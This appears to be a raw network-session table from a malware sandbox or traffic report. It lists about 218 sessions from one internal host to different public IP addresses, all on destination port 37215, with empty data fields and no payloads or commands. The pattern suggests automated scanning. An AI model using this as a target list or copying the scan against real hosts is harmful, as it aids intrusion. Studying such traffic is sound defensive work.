                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15118192.168.2.155883676.207.148.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15119192.168.2.1537500157.234.125.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15120192.168.2.1542110156.76.15.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15121192.168.2.1535548181.110.167.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15122192.168.2.1547230181.123.217.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15123192.168.2.1536236138.138.92.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15124192.168.2.1552838156.125.251.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15125192.168.2.1536386190.208.148.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15126192.168.2.1544684181.165.151.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15127192.168.2.1552028222.181.237.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15128192.168.2.153975645.13.5.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15129192.168.2.1559160121.85.187.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15130192.168.2.1538274186.232.7.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15131192.168.2.1539178116.119.2.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15132192.168.2.1548374121.71.14.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15133192.168.2.1541424181.145.215.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15134192.168.2.154372045.126.7.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15135192.168.2.1558956190.192.178.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15136192.168.2.1538086186.93.183.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15137192.168.2.1543188156.43.207.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15138192.168.2.154457294.179.82.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15139192.168.2.1539286186.8.42.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15140192.168.2.1535646122.208.59.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15141192.168.2.1543644102.75.102.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15142192.168.2.153637041.138.17.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15143192.168.2.1549250121.206.115.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15144192.168.2.1556560122.147.74.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15145192.168.2.1543330102.139.187.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15146192.168.2.154058494.33.157.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15147192.168.2.1550110122.226.244.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15148192.168.2.1533944222.164.151.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15149192.168.2.1553894102.228.119.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15150192.168.2.155100845.6.87.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15151192.168.2.153928645.12.80.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15152192.168.2.1544514102.55.251.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15153192.168.2.1550348121.45.237.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15154192.168.2.154590641.68.187.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15155192.168.2.1558788222.57.94.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15156192.168.2.1534820156.92.51.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15157192.168.2.1539470181.141.164.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15158192.168.2.1549082181.182.58.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15159192.168.2.1536478222.93.7.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15160192.168.2.1559616121.208.50.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15161192.168.2.1556364138.85.11.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15162192.168.2.1541682157.133.59.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15163192.168.2.1543218186.44.216.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15164192.168.2.1554798190.132.132.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15165192.168.2.154335841.66.67.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15166192.168.2.1541504156.220.189.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15167192.168.2.1536430102.179.20.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15168192.168.2.1550324222.61.17.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15169192.168.2.1552824190.177.90.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15170192.168.2.1538888121.36.172.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15171192.168.2.1550366181.63.172.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15172192.168.2.155872431.112.77.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15173192.168.2.1555650122.78.45.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15174192.168.2.1545550222.215.129.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15175192.168.2.1536922190.3.61.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15176192.168.2.1548812121.181.242.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15177192.168.2.1534330122.15.203.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15178192.168.2.1558466157.221.246.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15179192.168.2.1554458181.97.111.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15180192.168.2.1556174121.9.122.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15181192.168.2.1546234157.209.38.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15182192.168.2.1551968186.250.142.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15183192.168.2.1549450186.186.40.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15184192.168.2.154192831.137.89.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15185192.168.2.1545502122.30.253.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15186192.168.2.1552326222.122.142.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15187192.168.2.153438645.254.235.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15188192.168.2.1538230148.61.135.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15189192.168.2.1532978181.254.87.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15190192.168.2.1537130190.240.94.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15191192.168.2.1559946186.27.247.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15192192.168.2.1546424186.215.36.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15193192.168.2.155825094.192.105.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15194192.168.2.1558782102.153.203.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15195192.168.2.1542236197.55.196.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15196192.168.2.1537690181.34.94.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15197192.168.2.1551100181.225.98.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15198192.168.2.1544792138.10.71.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15199192.168.2.1541696190.190.210.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15200192.168.2.1547614197.255.158.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15201192.168.2.154961041.170.165.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15202192.168.2.1535018122.170.61.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15203192.168.2.1556756190.54.120.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15204192.168.2.155452494.113.137.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15205192.168.2.1549286157.127.61.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15206192.168.2.155334841.195.222.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15207192.168.2.153776841.128.23.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15208192.168.2.1547678197.218.166.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15209192.168.2.1547372181.184.93.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15210192.168.2.1533244197.237.75.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15211192.168.2.1560090156.124.76.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15212192.168.2.1534998138.172.92.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15213192.168.2.1555498102.56.248.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15214192.168.2.154510231.125.192.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15215192.168.2.154056041.28.154.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15216192.168.2.1550410121.29.142.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15217192.168.2.1548454190.153.165.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15218192.168.2.154892641.65.239.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15219192.168.2.1548862156.68.42.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15220192.168.2.153882831.45.227.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15221192.168.2.154765837.93.2.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15222192.168.2.155140631.176.134.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15223192.168.2.1549792181.135.122.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15224192.168.2.154095241.162.81.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15225192.168.2.1541402121.229.28.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15226192.168.2.1536618190.219.22.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15227192.168.2.1546166197.31.115.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15228192.168.2.1558910156.202.156.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15229192.168.2.1544242157.21.69.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15230192.168.2.155925445.132.47.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15231192.168.2.154543894.218.131.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15232192.168.2.1547340138.220.67.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15233192.168.2.154248031.205.216.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15234192.168.2.1542440186.41.213.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15235192.168.2.1559376181.253.104.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15236192.168.2.1539454186.220.162.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15237192.168.2.1543722210.157.136.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15238192.168.2.1557208197.255.134.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15239192.168.2.154441041.65.246.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15240192.168.2.1533654122.120.43.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15241192.168.2.1550822121.169.49.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15242192.168.2.155935841.167.231.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15243192.168.2.156003845.63.219.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15244192.168.2.1554270222.93.38.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15245192.168.2.1549796197.180.182.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15246192.168.2.1538920181.85.185.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15247192.168.2.1551084121.173.81.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15248192.168.2.1558372197.228.188.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15249192.168.2.1537428102.236.132.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15250192.168.2.1549152138.105.55.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15251192.168.2.1548222122.201.233.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15252192.168.2.1534394122.139.226.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15253192.168.2.1540468122.178.84.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15254192.168.2.153356641.110.235.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15255192.168.2.1551308190.205.207.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15256192.168.2.1550222197.191.79.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15257192.168.2.154963045.185.199.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15258192.168.2.1534392102.245.176.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15259192.168.2.1551344138.42.76.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15260192.168.2.1551138138.12.166.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15261192.168.2.1559322197.181.47.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15262192.168.2.1534114154.223.105.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15263192.168.2.154848241.171.71.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15264192.168.2.1552588186.1.182.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15265192.168.2.1543074197.146.207.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15266192.168.2.1557454122.110.62.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15267192.168.2.1558048197.6.48.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15268192.168.2.154070841.61.253.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15269192.168.2.1542184186.226.241.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15270192.168.2.1550978190.33.60.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15271192.168.2.1533754181.21.17.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15272192.168.2.1560126121.234.231.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15273192.168.2.1557670222.184.11.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15274192.168.2.1541454138.93.238.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15275192.168.2.1555310116.0.94.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15276192.168.2.1551484157.168.110.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15277192.168.2.1547422157.30.39.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15278192.168.2.153855241.17.216.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15279192.168.2.153906245.188.38.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15280192.168.2.1551836121.195.158.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15281192.168.2.153865845.132.42.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15282192.168.2.1537580153.49.178.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15283192.168.2.1535956157.93.191.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15284192.168.2.1554912156.166.30.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15285192.168.2.1548828195.197.3.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15286192.168.2.1544776186.153.217.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15287192.168.2.155662831.117.223.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15288192.168.2.1534234186.30.135.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15289192.168.2.155058698.97.168.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15290192.168.2.1540982122.194.6.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15291192.168.2.1556996138.92.186.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15292192.168.2.153279637.210.205.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15293192.168.2.1548020216.244.35.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15294192.168.2.1554012121.248.228.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15295192.168.2.1540444190.6.24.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15296192.168.2.1553452186.158.181.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15297192.168.2.153294241.41.175.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15298192.168.2.1560762156.174.60.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15299192.168.2.155609037.181.76.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15300192.168.2.1537946222.0.40.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15301192.168.2.154340831.26.93.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15302192.168.2.1559978156.207.54.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15303192.168.2.1547892186.119.229.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15304192.168.2.1551658144.116.192.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15305192.168.2.154891631.9.2.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15306192.168.2.155719431.35.65.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15307192.168.2.1543528181.147.169.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15308192.168.2.1538864156.2.5.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15309192.168.2.155208445.208.161.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15310192.168.2.1543460197.39.221.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15311192.168.2.1552774122.5.227.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15312192.168.2.1543302222.196.223.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15313192.168.2.1533966181.55.39.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15314192.168.2.1539202121.245.46.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15315192.168.2.1552810156.83.186.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15316192.168.2.155738841.42.52.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15317192.168.2.1558840197.203.184.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15318192.168.2.1550522181.39.69.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15319192.168.2.1540076222.77.84.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15320192.168.2.1540772197.100.25.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15321192.168.2.1541992121.96.154.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15322192.168.2.155695094.67.197.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15323192.168.2.1540648186.25.3.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15324192.168.2.1535676157.154.96.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15325192.168.2.1546478190.13.171.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15326192.168.2.1556168190.30.225.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15327192.168.2.154665094.104.202.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15328192.168.2.154226294.56.124.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15329192.168.2.1556100121.129.240.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15330192.168.2.1548718181.117.141.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15331192.168.2.153384894.251.212.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15332192.168.2.1542882157.48.144.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15333192.168.2.1560336138.65.135.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15334192.168.2.1543808186.7.176.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15335192.168.2.153735837.27.35.18237215
                                              TimestampBytes transferredDirectionData


